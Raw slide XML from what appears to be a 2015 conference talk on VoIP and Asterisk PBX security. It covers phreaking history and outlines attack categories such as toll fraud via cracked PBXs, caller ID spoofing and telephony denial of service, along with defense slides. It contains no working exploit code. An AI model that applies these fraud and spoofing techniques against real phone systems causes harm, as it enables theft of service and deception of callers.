            <a:ext cx="1196498" cy="119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052" y="1623526"/>
            <a:ext cx="3475947" cy="25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Exploitation Defense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767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</a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1" dirty="0"/>
              <a:t>Defending isn’t easy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="3429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en" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Avoid all-in-one distributions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0"/>
              <a:t>Custom build</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="0" indent="-342900" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0" smtClean="0"/>
              <a:t>It’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0"/>
              <a:t>not hard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="0" indent="-342900" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0"/>
              <a:t>Don’t build what you don’t need</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0"/>
              <a:t>Configure Properly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="0" indent="-285750" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0"/>
              <a:t>Turn off what isn’t used, needed or unknown </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="0" indent="-285750" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0"/>
              <a:t>See #3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" sz="1800" dirty="0"/>
              <a:t>Firewall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" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Fail2ban</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="1800" dirty="0"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501" y="3674"/>
            <a:ext cx="1196498" cy="119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725" y="1565987"/>
            <a:ext cx="3888349" cy="299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Fraud &amp; Abuse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864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What:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="252525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252525"/>
                </a:solidFill>
              </a:rPr>
              <a:t>No intention to pay</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="252525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252525"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Causes loss or damage to others or enables criminal to make a profit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-381000" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="252525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252525"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Manipulation of the telecommunications network to make it do something unintended for fun :)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600" y="1200150"/>
            <a:ext cx="3601824" cy="33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3324750" y="1007850"/>
            <a:ext cx="5889299" cy="73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dirty="0"/>
              <a:t>Cereal Killer: Snoop on to them...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70574" y="2837425"/>
            <a:ext cx="3330024" cy="21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86" y="340874"/>
            <a:ext cx="2892738" cy="21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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="191050" y="3428000"/>
            <a:ext cx="5889299" cy="73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36666"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nikon: As they snoop on to us.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="36666"/>
            </a:pP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384" name="Shape 384"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-624398">
            <a:off x="983310" y="2217185"/>
            <a:ext cx="5829492" cy="709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“Hackers” Movie Reference: FREE BINGO SPACE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Fraud &amp; Abuse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02900" cy="125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Q: Before Apple, what did electronic device made Steve Wozniak and Steve Jobs famous (or maybe notorious) in some circles?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2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1987225"/>
            <a:ext cx="5700900" cy="96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Q: Who were some of the earliest and largest users of blue boxes besides phreaks?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3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3024025"/>
            <a:ext cx="6821999" cy="922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Q: Besides blue boxes, name one other “box” type that was very popular. What did it do?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="393" name="Shape 393"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3821400"/>
            <a:ext cx="6047399" cy="922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Q: What feat focused the FBI on apprehending John Draper aka Capt. Crunch? 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962" y="519499"/>
            <a:ext cx="1407600" cy="10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923" y="965875"/>
            <a:ext cx="1700449" cy="14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1744" y="3456262"/>
            <a:ext cx="1489955" cy="143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we’ll cover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History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Attacks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Defense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Cats || Dogs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Other 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75" y="1200150"/>
            <a:ext cx="5643293" cy="3236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749900" y="3912900"/>
            <a:ext cx="2509199" cy="9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Which may include Memes, cartoons, and silly tricks with Asterisk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350" y="0"/>
            <a:ext cx="34006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Fraud &amp; Abuse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259325" y="1073750"/>
            <a:ext cx="5484299" cy="3675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/>
              <a:t>Making money - IRSF, traffic pumping schemes (see last year’s talk) enabled by cracked PBX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-3302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Call generation or forwarding, voicemail dialout, routing changes, etc. to make calls to high-cost destinations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/>
              <a:t>Caller ID spoofing (“backspoofing”) for social engineering (&lt;&gt; caller id), or pin bypass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/>
              <a:t>Eavesdropping - personal / spycraft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/>
              <a:t>Telephony Denial of Service - scripted calls to tie up someone’s phone for prank, protest, extortion, etc.</a:t>
            </a:r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625" y="0"/>
            <a:ext cx="1063376" cy="10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Fraud &amp; Abuse Demo</a:t>
            </a:r>
          </a:p>
        </p:txBody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Two examples of “backspoofing” on GitHub, we’ll look at one.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Faked caller number to spoof CNAM display.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Fraud &amp; Abuse Defense</a:t>
            </a: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457200" y="1215775"/>
            <a:ext cx="4200299" cy="1688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/>
              <a:t>Credential cracking protections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/>
              <a:t>Block international destinations that are in NANP besides just 011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/>
              <a:t>See what protections your provider has - bill limits, per-minute limits, destination whitelists, etc.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500" y="1556725"/>
            <a:ext cx="4122575" cy="175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457200" y="3804625"/>
            <a:ext cx="8468700" cy="6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Disable call forwarding, and only allow it selectively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Do not allow voicemail and conf bridge dialout and voicemail auto-dialback</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="2000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="419" name="Shape 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7501" y="3674"/>
            <a:ext cx="1196498" cy="119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Fraud &amp; Abuse Defense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334725" y="1428750"/>
            <a:ext cx="5275499" cy="293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Set pins on LD trunks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TLS &amp; SRTP - At least make it harder. Cert mgt is hard, but even one org cert on a client helps. Use GOOD algorithms, and stay patched :’-(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Look for security or fraud mgt systems that learn traffic baselines and watch for changes in ratio, frequency, or direction</a:t>
            </a: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501" y="3674"/>
            <a:ext cx="1196498" cy="119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225" y="1951025"/>
            <a:ext cx="3359574" cy="18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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="456847"/>
            <a:ext cx="7772400" cy="72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chemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://github.com/unregistered436/CC11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512" y="1825900"/>
            <a:ext cx="2704974" cy="27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BACKUP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Current Foreign NPAs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264 ANGUILLA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268 ANTIGUA/BARBUDA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242 BAHAMAS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246 BARBADOS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441 BERMUDA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284 BRITISH VIRGIN ISLANDS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345 CAYMAN ISLANDS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767 DOMINICA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809 DOMINICAN REPUBLIC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829 DOMINICAN REPUBLIC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849 DOMINICAN REPUBLIC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46" name="Shape 446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473 GRENADA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658 JAMAICA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876 JAMAICA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664 MONTSERRAT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721 SINT MAARTEN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869 ST. KITTS AND NEVIS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758 ST. LUCIA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784 ST. VINCENT &amp; GRENADINES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868 TRINIDAD AND TOBAGO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649 TURKS &amp; CAICOS ISLANDS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13050" y="4639525"/>
            <a:ext cx="9144000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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.nanpa.com/reports/area_code_relief_planning.html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574100" y="1634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Telephony History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154950"/>
            <a:ext cx="5100899" cy="2937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/>
              <a:t>Telegraph </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" dirty="0" smtClean="0"/>
              <a:t>P2P</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="2000" dirty="0"/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/>
              <a:t>First phones P2P w/no dialing. Exchange &amp; number given to operator. LD operator-&gt;operator.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/>
              <a:t>Strowger switch - alternating current pulses &amp; mechanical cylinder switch per digit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/>
              <a:t>First user dialing enabled - exchange name converted to number to dial in small area</a:t>
            </a:r>
          </a:p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475" y="279425"/>
            <a:ext cx="1289374" cy="21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450" y="1595200"/>
            <a:ext cx="2300975" cy="2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2550" y="3445500"/>
            <a:ext cx="2250075" cy="161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378" y="1526025"/>
            <a:ext cx="3122325" cy="29835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6944925" y="1063375"/>
            <a:ext cx="2078100" cy="4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0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(No, not THAT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strowger!) </a:t>
            </a:r>
            <a:endParaRPr lang="en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574100" y="1634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Telephony History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57200" y="1154950"/>
            <a:ext cx="4822499" cy="2937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Burgeoning operator workforce growth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Panel &amp; Crossbar “common control” built number in sender then processed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The 4A crossbar and card control</a:t>
            </a:r>
          </a:p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79" name="Shape 79"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426900" y="2891150"/>
            <a:ext cx="4883099" cy="131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POP QUIZ @$#%!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-330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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q: SF and MF - what tone critical? XXXX MHz?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-330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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Q: What was the design flaw that revolutionized the industry?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629" y="2157199"/>
            <a:ext cx="3467174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Callout 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6447453" y="1034000"/>
            <a:ext cx="2356247" cy="868100"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -20335"/>
              <a:gd name="adj2" fmla="val 8400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It’s true mom, the guys from FALE are SO dreamy!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Rise of the Phreaks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49300" y="1063375"/>
            <a:ext cx="8337600" cy="1891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b="1" i="1"/>
              <a:t>Secrets of the Little Blue Box</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>, 1971 Esquire article introduced world to “Phreaking” but the guys in the article such as Joe Engressia, Mark Bernay, and John Draper were not the first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Phreaks learned via listening and trying to recreate tones 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Bell System Technical Journal in ‘60s exposed design details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625" y="2702300"/>
            <a:ext cx="3578824" cy="20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359341" y="2426333"/>
            <a:ext cx="4127400" cy="178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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Charlie Pyne, Tony Lauck &amp; Ed Ross @MIT &amp; Harvard ‘59-’60 (first FBI test case?)</a:t>
            </a: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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MANY others figured out the fatal flaw on their own</a:t>
            </a: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>
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Phun stuff like joke-lines were a ToS violation - why</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en" sz="18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35436" y="4834221"/>
            <a:ext cx="4603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See “Exploding the Phone” by Phil </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1" smtClean="0"/>
              <a:t>Lapsley</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="11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Evolution of VoIP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8222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/>
              <a:t>Common Channel Interoffice Signaling (CCIS) switches go digital w/modems and CAMA-C billing - ending blue boxing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/>
              <a:t>Personal computers come out, and if switches can use modems…</a:t>
            </a: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/>
              <a:t>Computer terminals and BBS were “safer” than phreaking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25" y="3527775"/>
            <a:ext cx="839324" cy="1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4798800" y="1200150"/>
            <a:ext cx="3888000" cy="340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IP enabled transport of ALL data, including voice. H.323, H.248, SIP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-330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Analog systems (phones, PBX, carrier switches) see IP versions or IP cards crammed in the back of existing hardware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-330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Next came all IP developed PBX, with separate gateways for analog connections, consumer MTAs with analog ports, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-330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Virtualization enabled IP systems on just software, opening things up to hobbyist VoIP hackers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150" y="3527775"/>
            <a:ext cx="1106469" cy="12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2034225" y="3998300"/>
            <a:ext cx="791399" cy="34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4625" y="4708900"/>
            <a:ext cx="3564299" cy="29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/>
              <a:t>1999? (Then)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>                                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1000"/>
              <a:t>Now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4427</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>583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Courier New</vt:lpstr>
      <vt:lpstr>Impact</vt:lpstr>
      <vt:lpstr>Trebuchet MS</vt:lpstr>
      <vt:lpstr>simple-light</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Phony Business</vt:lpstr>
      <vt:lpstr>First: A brief word from our lawyer</vt:lpstr>
      <vt:lpstr>Why are we doing this?</vt:lpstr>
      <vt:lpstr>What we’ll cover</vt:lpstr>
      <vt:lpstr>Telephony History</vt:lpstr>
      <vt:lpstr>Telephony History</vt:lpstr>
      <vt:lpstr>The Rise of the Phreaks</vt:lpstr>
      <vt:lpstr>Evolution of VoIP</vt:lpstr>
      <vt:lpstr>Future of VoIP?</vt:lpstr>
      <vt:lpstr>IT’S A BRAND NEW CAR!!!</vt:lpstr>
      <vt:lpstr>Introducing Asterisk!</vt:lpstr>
      <vt:lpstr>Introducing Asterisk!</vt:lpstr>
      <vt:lpstr>Asterisk variants...</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Attack vs Defense</vt:lpstr>
      <vt:lpstr>Information Leakage</vt:lpstr>
      <vt:lpstr>Information Leakage</vt:lpstr>
      <vt:lpstr>Information Leakage</vt:lpstr>
      <vt:lpstr>Information Leakage</vt:lpstr>
      <vt:lpstr>SIP &amp; SDP</vt:lpstr>
      <vt:lpstr>SIP REGISTER response example</vt:lpstr>
      <vt:lpstr>Dark Ages Crypto</vt:lpstr>
      <vt:lpstr>SIP VoIP info gathering tips</vt:lpstr>
      <vt:lpstr>Information Leakage Demo</vt:lpstr>
      <vt:lpstr>Information Leakage Defense</vt:lpstr>
      <vt:lpstr>Denial of Service</vt:lpstr>
      <vt:lpstr>Denial of Service</vt:lpstr>
      <vt:lpstr>Denial of Service</vt:lpstr>
      <vt:lpstr>Denial of Service</vt:lpstr>
      <vt:lpstr>Denial of Service</vt:lpstr>
      <vt:lpstr>Denial of Service Demo</vt:lpstr>
      <vt:lpstr>Denial of Service Defense</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>Exploitation</vt:lpstr>
      <vt:lpstr>TrixBox</vt:lpstr>
      <vt:lpstr>Vulnerabilities</vt:lpstr>
      <vt:lpstr>Exploitation Demo</vt:lpstr>
      <vt:lpstr>Exploitation Demo</vt:lpstr>
      <vt:lpstr>Exploitation Demo</vt:lpstr>
      <vt:lpstr>Exploitation Demo</vt:lpstr>
      <vt:lpstr>Exploitation Demo</vt:lpstr>
      <vt:lpstr>Exploitation Defense</vt:lpstr>
      <vt:lpstr>Exploitation Defense</vt:lpstr>
      <vt:lpstr>Exploitation Defense</vt:lpstr>
      <vt:lpstr>Fraud &amp; Abuse</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Fraud &amp; Abuse</vt:lpstr>
      <vt:lpstr>Fraud &amp; Abuse</vt:lpstr>
      <vt:lpstr>Fraud &amp; Abuse Demo</vt:lpstr>
      <vt:lpstr>Fraud &amp; Abuse Defense</vt:lpstr>
      <vt:lpstr>Fraud &amp; Abuse Defense</vt:lpstr>
      <vt:lpstr>https://github.com/unregistered436/CC11</vt:lpstr>
      <vt:lpstr>BACKUP</vt:lpstr>
      <vt:lpstr>Current Foreign NPAs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</dc:creator>
  <cp:lastModifiedBy>Patrick</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-03-20T16:56:07Z</dcterms:modified>
</cp:coreProperties>
</file>